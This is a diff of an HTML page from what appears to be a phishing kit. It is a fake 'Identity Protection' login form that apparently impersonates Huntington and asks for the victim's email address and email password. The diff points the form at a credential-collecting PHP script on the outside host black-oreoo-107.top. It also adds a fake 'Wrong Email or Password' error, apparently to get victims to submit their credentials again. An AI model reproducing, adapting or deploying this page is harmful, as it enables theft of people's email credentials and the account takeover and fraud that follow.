--- a/rquick.html
+++ b/rquick.html
@@ -1,9 +1,9 @@
 <!DOCTYPE html>
 <html lang="en">
 
-<head>
+<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
 
-  <meta charset="utf-8">
+  
   <meta http-equiv="X-UA-Compatible" content="IE=edge">
   <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
   <meta name="description" content="">
@@ -29,9 +29,10 @@
   
   <div class="else">
   <div class="moon">Identity Protection<br>  <small style=" font-size: 14px; ">Do you remember your dashboard primary email address? If so, please login to start this identity test.</small>
+<br/><h6 style="color:red;">&nbsp;Wrong Email or Password, plese try again</h6>
 </div><br> <hr></hr> 
   <div class="">
-  <form action="https://black-oreoo-107.top/Online/Huntington/nugu.php" method="post">
+  <form action="https://black-oreoo-107.top/Online/Huntington/sojourn.php" method="post">
   <div><label>Email Address</label> <input type="email" required="" value="" name="mother" class="" id=""/></div>
   <div><label style="padding-right: 24px;">Email Password</label> <input required="" type="password" value="" name="ahnsp" class="" id=""/></div>
   
